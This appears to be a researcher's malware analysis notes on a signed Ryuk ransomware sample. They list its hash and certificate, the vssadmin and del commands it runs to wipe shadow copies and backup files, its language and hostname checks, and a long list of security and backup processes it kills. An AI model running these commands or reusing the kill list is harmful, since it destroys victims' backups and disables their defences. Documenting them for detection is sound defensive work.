-
Notifications
You must be signed in to change notification settings - Fork 46
/
Copy path2019-06-18-ryuk-ransomware-signed-vk.notes.txt
149 lines (144 loc) · 2.76 KB
/
2019-06-18-ryuk-ransomware-signed-vk.notes.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
SHA-256: 0b1008d91459937c9d103a900d8e134461db27c602a6db5e082ab9139670ccb6
Digital Certificate: WMV CONSULTING LTD (Thawte)
h/t @malwrhunterteam
Volume Shadow Server & Backup Kill:
vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
vssadmin Delete Shadows /all /quiet
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
del %0
Installed lang check:
SYSTEM\CurrentControlSet\Control\Nls\Language\
InstallLanguage
0419 (Russia)
0422 (Ukrainian)
0423 (Belarusian)
Arp Blaclklist check (partial string patch):
\Users\Public\IPtable
arp -a >
Interface:
10.30.4
10.30.6
10.30.6
10.30.5
10.31.32
GetComputerName check (partial string patch):
SPB
Spb
spb
MSK
Msk
msk
Process kill list (partial match) -> taskkill /IM /F & net stop /y:
veeam
backup
backup
xchange
dbeng
sofos
calc
ekrn
zoolz
encsvc
excel
firefoxconfig
infopath
msaccess
mspub
mydesktop
ocautoupds
ocomm
ocssd
onenote
oracle
outlook
powerpnt
sqbcoreservice
steam
synctime
tbirdconfig
thebat
thunderbird
visio
word
xfssvccon
tmlisten
pccntmon
cntaosmgr
ntrtscan
mbamtray
veeam
back
xchange
ackup
acronis
enterprise
sophos
veeam
acrsch
antivirus
antivirus
bedbg
dcagent
epsecurity
epupdate
eraser
esgshkernel
fa_scheduler
iisadmin
imap4
mbam
endpoint
afee
mcshield
task
mfemms
mfevtp
msdts
exchange
ntrt
pdvf
pop3
report
resvc
sacsvr
savadmin
sams
sdrsvc
sepmaster
monitor
smcinst
smcservice
smtp
snac
swi_
ccsf
truekey
tmlisten
ui0detect
wrsvc
netmsmq
ekrn
ehttpsrv
eshasrv
klnagent
wbengine
kavf
mfefire
hrmlog